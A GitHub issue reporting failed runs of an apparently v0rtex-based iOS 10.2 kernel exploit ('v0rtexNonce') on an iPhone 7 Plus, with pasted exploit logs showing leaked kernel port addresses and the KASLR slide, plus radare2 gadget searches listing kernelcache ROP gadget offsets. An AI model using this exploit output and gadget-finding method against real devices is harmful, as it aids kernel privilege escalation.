Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

ip7+ 10.2 "Failed to leak realport address", "Invalid shift mask" or restart automatically #53

Open
Xiaobin0860 opened this issue Mar 2, 2018 · 1 comment
Open

ip7+ 10.2 "Failed to leak realport address", "Invalid shift mask" or restart automatically #53

Xiaobin0860 opened this issue Mar 2, 2018 · 1 comment

Comments

@Xiaobin0860
Copy link

Xiaobin0860 commented Mar 2, 2018
edited
Loading

2018-03-02 09:22:24.677041 v0rtexNonce[246:6322] uid isn't 0
2018-03-02 09:22:27.976314 v0rtexNonce[246:6322] Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010
2018-03-02 09:22:27.976487 v0rtexNonce[246:6322] loading offsets for iPhone9,2 - 14C92
2018-03-02 09:22:27.976565 v0rtexNonce[246:6322] test offset x0x0x10gadget: b592b8
2018-03-02 09:22:27.976928 v0rtexNonce[246:6322] service: 5d0b
2018-03-02 09:22:27.977261 v0rtexNonce[246:6322] client: 5e0b, (os/kern) successful
2018-03-02 09:22:27.978078 v0rtexNonce[246:6322] newSurface: (os/kern) successful
2018-03-02 09:22:27.978305 v0rtexNonce[246:6322] realport: 5f03, (os/kern) successful
2018-03-02 09:22:28.006642 v0rtexNonce[246:6322] port: 106003
2018-03-02 09:22:28.007610 v0rtexNonce[246:6322] mach_port_insert_right: (os/kern) successful
2018-03-02 09:22:28.008615 v0rtexNonce[246:6322] mach_ports_register: (os/kern) successful
2018-03-02 09:22:28.008776 v0rtexNonce[246:6322] herp derp

2018-03-02 09:22:28.110803 v0rtexNonce[246:6322] mach_ports_register: (os/kern) successful
2018-03-02 09:22:28.448730 v0rtexNonce[246:6322] mach_port_get_context: 0x300000a100000011, (os/kern) successful
2018-03-02 09:22:28.449064 v0rtexNonce[246:6322] reallocate_buf: (os/kern) successful
2018-03-02 09:22:28.449113 v0rtexNonce[246:6322] mach_port_request_notification(realport): 0, (os/kern) successful
2018-03-02 09:22:28.449215 v0rtexNonce[246:6322] getValue(161): 0x1010 bytes, (os/kern) successful
2018-03-02 09:22:28.449232 v0rtexNonce[246:6322] Failed to leak realport address
2018-03-02 09:22:28.456102 v0rtexNonce[246:6322] Failed to get kernel task
2018-03-02 09:22:28.489822 v0rtexNonce[246:6322] Reading var failed
2018-03-02 09:22:28.489888 v0rtexNonce[246:6322] current generator:

2018-03-02 10:16:39.810735 v0rtexNonce[217:4344] uid isn't 0
2018-03-02 10:16:39.813292 v0rtexNonce[217:4344] Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010
2018-03-02 10:16:39.813345 v0rtexNonce[217:4344] loading offsets for iPhone9,2 - 14C92
2018-03-02 10:16:39.813369 v0rtexNonce[217:4344] test offset x0x0x10gadget: b592b8
2018-03-02 10:16:39.813462 v0rtexNonce[217:4344] service: 5d0b
2018-03-02 10:16:39.813581 v0rtexNonce[217:4344] client: 5e0b, (os/kern) successful
2018-03-02 10:16:39.813882 v0rtexNonce[217:4344] newSurface: (os/kern) successful
2018-03-02 10:16:39.813943 v0rtexNonce[217:4344] realport: 5f03, (os/kern) successful
2018-03-02 10:16:39.830728 v0rtexNonce[217:4344] port: 106003
2018-03-02 10:16:39.830891 v0rtexNonce[217:4344] mach_port_insert_right: (os/kern) successful
2018-03-02 10:16:39.830954 v0rtexNonce[217:4344] mach_ports_register: (os/kern) successful
2018-03-02 10:16:39.831011 v0rtexNonce[217:4344] herp derp
2018-03-02 10:16:39.941308 v0rtexNonce[217:4344] mach_ports_register: (os/kern) successful
2018-03-02 10:16:40.453699 v0rtexNonce[217:4344] mach_port_get_context: 0x0000000000000011, (os/kern) successful
2018-03-02 10:16:40.453769 v0rtexNonce[217:4344] Invalid shift mask.
2018-03-02 10:16:40.465956 v0rtexNonce[217:4344] Failed to get kernel task
2018-03-02 10:16:40.512669 v0rtexNonce[217:4344] Reading var failed
2018-03-02 10:16:40.512767 v0rtexNonce[217:4344] current generator:

2018-03-02 09:24:43.394738 v0rtexNonce[236:5176] uid isn't 0
2018-03-02 09:24:43.396583 v0rtexNonce[236:5176] Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010
2018-03-02 09:24:43.396620 v0rtexNonce[236:5176] loading offsets for iPhone9,2 - 14C92
2018-03-02 09:24:43.396636 v0rtexNonce[236:5176] test offset x0x0x10gadget: b592b8
2018-03-02 09:24:43.396704 v0rtexNonce[236:5176] service: 5d0b
2018-03-02 09:24:43.396786 v0rtexNonce[236:5176] client: 5e0b, (os/kern) successful
2018-03-02 09:24:43.396918 v0rtexNonce[236:5176] newSurface: (os/kern) successful
2018-03-02 09:24:43.396947 v0rtexNonce[236:5176] realport: 5f03, (os/kern) successful
2018-03-02 09:24:43.401767 v0rtexNonce[236:5176] port: 106003
2018-03-02 09:24:43.401816 v0rtexNonce[236:5176] mach_port_insert_right: (os/kern) successful
2018-03-02 09:24:43.401848 v0rtexNonce[236:5176] mach_ports_register: (os/kern) successful
2018-03-02 09:24:43.401876 v0rtexNonce[236:5176] herp derp
2018-03-02 09:24:43.502946 v0rtexNonce[236:5176] mach_ports_register: (os/kern) successful
2018-03-02 09:24:43.731182 v0rtexNonce[236:5176] mach_port_get_context: 0x1000008c00000000, (os/kern) successful
restart ...

2018-03-02 09:29:43.891386 v0rtexNonce[219:3861] uid isn't 0
2018-03-02 09:29:43.896480 v0rtexNonce[219:3861] Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010
2018-03-02 09:29:43.897003 v0rtexNonce[219:3861] loading offsets for iPhone9,2 - 14C92
2018-03-02 09:29:43.897204 v0rtexNonce[219:3861] test offset x0x0x10gadget: b592b8
2018-03-02 09:29:43.897792 v0rtexNonce[219:3861] service: 5d0b
2018-03-02 09:29:43.898018 v0rtexNonce[219:3861] client: 5e0b, (os/kern) successful
2018-03-02 09:29:43.898263 v0rtexNonce[219:3861] newSurface: (os/kern) successful
2018-03-02 09:29:43.898396 v0rtexNonce[219:3861] realport: 5f03, (os/kern) successful
2018-03-02 09:29:43.920022 v0rtexNonce[219:3861] port: 106003
2018-03-02 09:29:43.920791 v0rtexNonce[219:3861] mach_port_insert_right: (os/kern) successful
2018-03-02 09:29:43.921034 v0rtexNonce[219:3861] mach_ports_register: (os/kern) successful
2018-03-02 09:29:43.921262 v0rtexNonce[219:3861] herp derp
2018-03-02 09:29:44.037376 v0rtexNonce[219:3861] mach_ports_register: (os/kern) successful
2018-03-02 09:29:44.344575 v0rtexNonce[219:3861] mach_port_get_context: 0x200000ac00000000, (os/kern) successful
2018-03-02 09:29:44.354845 v0rtexNonce[219:3861] reallocate_buf: (os/kern) successful
restart ...

2018-03-02 09:55:05.965573 v0rtexNonce[222:3927] uid isn't 0
2018-03-02 09:55:05.967786 v0rtexNonce[222:3927] Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010
2018-03-02 09:55:05.967838 v0rtexNonce[222:3927] loading offsets for iPhone9,2 - 14C92
2018-03-02 09:55:05.967887 v0rtexNonce[222:3927] test offset x0x0x10gadget: b592b8
2018-03-02 09:55:05.967985 v0rtexNonce[222:3927] service: 5d0b
2018-03-02 09:55:05.968106 v0rtexNonce[222:3927] client: 5e0b, (os/kern) successful
2018-03-02 09:55:05.968233 v0rtexNonce[222:3927] newSurface: (os/kern) successful
2018-03-02 09:55:05.968278 v0rtexNonce[222:3927] realport: 5f03, (os/kern) successful
2018-03-02 09:55:05.989664 v0rtexNonce[222:3927] port: 106003
2018-03-02 09:55:05.989742 v0rtexNonce[222:3927] mach_port_insert_right: (os/kern) successful
2018-03-02 09:55:05.989795 v0rtexNonce[222:3927] mach_ports_register: (os/kern) successful
2018-03-02 09:55:05.989839 v0rtexNonce[222:3927] herp derp
2018-03-02 09:55:06.100897 v0rtexNonce[222:3927] mach_ports_register: (os/kern) successful
2018-03-02 09:55:06.518535 v0rtexNonce[222:3927] mach_port_get_context: 0x300000a300000011, (os/kern) successful
2018-03-02 09:55:06.528810 v0rtexNonce[222:3927] reallocate_buf: (os/kern) successful
2018-03-02 09:55:06.528918 v0rtexNonce[222:3927] mach_port_request_notification(realport): 0, (os/kern) successful
2018-03-02 09:55:06.529059 v0rtexNonce[222:3927] getValue(163): 0x1010 bytes, (os/kern) successful
2018-03-02 09:55:06.529092 v0rtexNonce[222:3927] realport addr: 0xffffffe0041bdae8
2018-03-02 09:55:06.529128 v0rtexNonce[222:3927] mach_port_request_notification(fakeport): 6007, (os/kern) successful
2018-03-02 09:55:06.529252 v0rtexNonce[222:3927] getValue(163): 0x1010 bytes, (os/kern) successful
2018-03-02 09:55:06.529276 v0rtexNonce[222:3927] fakeport addr: 0xffffffe00445e178
2018-03-02 09:55:06.539468 v0rtexNonce[222:3927] reallocate_buf: (os/kern) successful
2018-03-02 09:55:06.539570 v0rtexNonce[222:3927] itk_space: 0xffffffe000545cb0
2018-03-02 09:55:06.539605 v0rtexNonce[222:3927] self_task: 0xffffffe001409540
2018-03-02 09:55:06.539637 v0rtexNonce[222:3927] IOSurfaceRootUserClient port: 0xffffffe0046a9260
2018-03-02 09:55:06.539711 v0rtexNonce[222:3927] IOSurfaceRootUserClient addr: 0xffffffe002606600
2018-03-02 09:55:06.539744 v0rtexNonce[222:3927] IOSurfaceRootUserClient vtab: 0xfffffff01d4521e0
2018-03-02 09:55:06.539762 v0rtexNonce[222:3927] slide: 0x0000000016600000
2018-03-02 09:55:06.539789 v0rtexNonce[222:3927] mach_ports_register: (os/kern) successful
2018-03-02 09:55:06.539824 v0rtexNonce[222:3927] zone_map: 0x0000000014000000
restart ...
@Xiaobin0860
Copy link
Author

Why OFFSET_ROP_ADD_X0_X0_0x10 and OFFSET_ROP_LDR_X0_X0_0x10 are 32 bits?
Should I try other address?

$ r2 -q -e scr.color=true -c ""/a add x0, x0, 0x10; ret"" kernelcache 2> /dev/null
0x00b592b8 hit0_0 00400091c0035fd6
0x00cb4b34 hit0_1 00400091c0035fd6
0x00d3dd78 hit0_2 00400091c0035fd6
0x00d92dd8 hit0_3 00400091c0035fd6
0x00d9969c hit0_4 00400091c0035fd6
0x01162fa8 hit0_5 00400091c0035fd6
0xfffffff0063e529c hit0_6 00400091c0035fd6
0xfffffff006540b18 hit0_7 00400091c0035fd6
0xfffffff0065c9d5c hit0_8 00400091c0035fd6
0xfffffff00661edbc hit0_9 00400091c0035fd6
0xfffffff006625680 hit0_10 00400091c0035fd6
0xfffffff0069eef8c hit0_11 00400091c0035fd6

$ r2 -q -e scr.color=true -c ""/a ldr x0, [x0, 0x10]; ret"" kernelcache 2> /dev/null
0x00261884 hit0_0 000840f9c0035fd6
0x003b32e8 hit0_1 000840f9c0035fd6
0x003e4fa4 hit0_2 000840f9c0035fd6
0x003f1cc0 hit0_3 000840f9c0035fd6
0x00421174 hit0_4 000840f9c0035fd6
0x004730cc hit0_5 000840f9c0035fd6
0x0048a710 hit0_6 000840f9c0035fd6
0x0048cfc8 hit0_7 000840f9c0035fd6
0x0048fdac hit0_8 000840f9c0035fd6
0x004d0828 hit0_9 000840f9c0035fd6
0x004d5a38 hit0_10 000840f9c0035fd6
0x004d7fa8 hit0_11 000840f9c0035fd6
0x004ed038 hit0_12 000840f9c0035fd6
0x00512498 hit0_13 000840f9c0035fd6
0x00aa4ad4 hit0_14 000840f9c0035fd6
0x00ab45a4 hit0_15 000840f9c0035fd6
0x00b770d0 hit0_16 000840f9c0035fd6
0x00c2e620 hit0_17 000840f9c0035fd6
0x00c8bcec hit0_18 000840f9c0035fd6
0x00d0ebc0 hit0_19 000840f9c0035fd6
0x00d3e0d4 hit0_20 000840f9c0035fd6
0x00dd8f98 hit0_21 000840f9c0035fd6
0x00decd38 hit0_22 000840f9c0035fd6
0x010493a0 hit0_23 000840f9c0035fd6
0x01060838 hit0_24 000840f9c0035fd6
0x010685b8 hit0_25 000840f9c0035fd6
0x01076f68 hit0_26 000840f9c0035fd6
0x010e3b54 hit0_27 000840f9c0035fd6
0x011aa300 hit0_28 000840f9c0035fd6
0x012ed2d8 hit0_29 000840f9c0035fd6
0x013a3ef8 hit0_30 000840f9c0035fd6
0x01551600 hit0_31 000840f9c0035fd6
0xfffffff006330ab8 hit0_32 000840f9c0035fd6
0xfffffff006340588 hit0_33 000840f9c0035fd6
0xfffffff0064030b4 hit0_34 000840f9c0035fd6
0xfffffff0064ba604 hit0_35 000840f9c0035fd6
0xfffffff006517cd0 hit0_36 000840f9c0035fd6
0xfffffff00659aba4 hit0_37 000840f9c0035fd6
0xfffffff0065ca0b8 hit0_38 000840f9c0035fd6
0xfffffff006664f7c hit0_39 000840f9c0035fd6
0xfffffff006678d1c hit0_40 000840f9c0035fd6
0xfffffff0068d5384 hit0_41 000840f9c0035fd6
0xfffffff0068ec81c hit0_42 000840f9c0035fd6
0xfffffff0068f459c hit0_43 000840f9c0035fd6
0xfffffff006902f4c hit0_44 000840f9c0035fd6
0xfffffff00696fb38 hit0_45 000840f9c0035fd6
0xfffffff006a362e4 hit0_46 000840f9c0035fd6
0xfffffff006b792bc hit0_47 000840f9c0035fd6
0xfffffff006c2fedc hit0_48 000840f9c0035fd6
0xfffffff006ddd5e4 hit0_49 000840f9c0035fd6
0xfffffff007265868 hit0_50 000840f9c0035fd6
0xfffffff0073b72cc hit0_51 000840f9c0035fd6
0xfffffff0073e8f88 hit0_52 000840f9c0035fd6
0xfffffff0073f5ca4 hit0_53 000840f9c0035fd6
0xfffffff007425158 hit0_54 000840f9c0035fd6
0xfffffff0074770b0 hit0_55 000840f9c0035fd6
0xfffffff00748e6f4 hit0_56 000840f9c0035fd6
0xfffffff007490fac hit0_57 000840f9c0035fd6
0xfffffff007493d90 hit0_58 000840f9c0035fd6
0xfffffff0074d480c hit0_59 000840f9c0035fd6
0xfffffff0074d9a1c hit0_60 000840f9c0035fd6
0xfffffff0074dbf8c hit0_61 000840f9c0035fd6
0xfffffff0074f101c hit0_62 000840f9c0035fd6
0xfffffff00751647c hit0_63 000840f9c0035fd6

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Xiaobin0860